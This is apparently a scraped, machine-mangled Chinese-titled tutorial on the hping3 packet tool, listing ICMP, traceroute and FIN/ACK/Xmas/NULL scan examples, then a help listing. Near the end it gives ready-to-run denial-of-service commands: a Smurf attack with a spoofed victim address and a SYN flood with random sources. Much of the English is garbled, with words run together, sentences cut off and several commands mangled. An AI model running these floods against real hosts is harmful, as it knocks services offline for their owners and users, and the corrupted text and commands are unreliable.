hping3的使用方法
hping3的使用方法
1 .测试icmp 3360 inthisexamplehping3willbehavelikeanormalpingutility,sending icmp-echoundreceivingicmp-reply
hping3 -1 0daysecurity.com
2.tracerouteusingicmp 3360 thisexampleissimilartofamousutilitiesliketracert [ windows ] or traceroute [ Linux ] whousesicmpaceroute
hping3----traceroute-v-10 day security.com
3.checking port : here hping3willsendasynpackettoaspecifiedport (80 in our example ).wecancontrolalsofromwhichlocalportwilllsportwilstwills
hping3- v-s-p80-s 50500 day security.com
4.traceroutetoadeterminedport : anicefeaturefromhping3isthatyoucandoatraceroutetoaspecifiedportwatchingwhereyourpacketisbl
hping3----traceroute-v-s-p80-s 50500 day security.com
5.othertypesoficmp 3360 thisexamplesendsaicmpaddressmaskrequest (type 17 )。
hping3- C1-v-1-c 170 day security.com
6.othertypesofportscanning 3360 firsttypewilltryisthefinscan.inatcpconnectionthefinflagisusedtostarttheconnectionclonclosingr on a reply,thatmeanstheportisopen.normallyfirewallssendarstackpacketbacktosignaltheportisclosed .
hping3- C1-v-p80-s 5050-f 0day security.com
7.ack scan 3360 thisscancanbeusedtoseeifahostisalive (whenpingisblockedforexample ).thisshouldsendarstresponsebackiftheport
hping3- C1-v-p80-s 5050-a 0day security.com
8.xmas scan 3360 thisscansetsthesequencenumbertozeroandsettheurgpshfinflagsinthepacket.ifthetargetdevice ' stcpportisclosed, thetargetdevicesendsatcprstpacketinreply.ifthetargetdevice ' stcpportisopen,thetargetdiscardsthetcpxmasscan,sendingnororororor
hping3- C1-v-p80-s 5050-m0-UPF 0day security.com
9 .空扫描3360 thisscansetsthesequencenumbertozeroandhavenoflagssetinthepacket.ifthetargetdevice ' stcpportisclosed, thetargetdevicesendsatcprstpacketinreply.ifthetargetdevice ' stcpportisopen,the target discards th
e TCP NULL scan, sending no reply.hping3 -c 1 -V -p 80 -s 5050 -Y 0daysecurity.com
10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
11. DOS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
--flood: sent packets as fast as possible. Don't show replies.
--rand-dest: random destionation address mode. see zxdwd.
-V
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode ajdxh/p>
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
-a --spoof spoof source address
--rand-dest random destionation address mode. see zxdwd.
--rand-source random source address mode. see zxdwd.
-t --ttl ttl (default 64)
-N --id id (default random)
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
-C --icmptype icmp type (default echo request)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)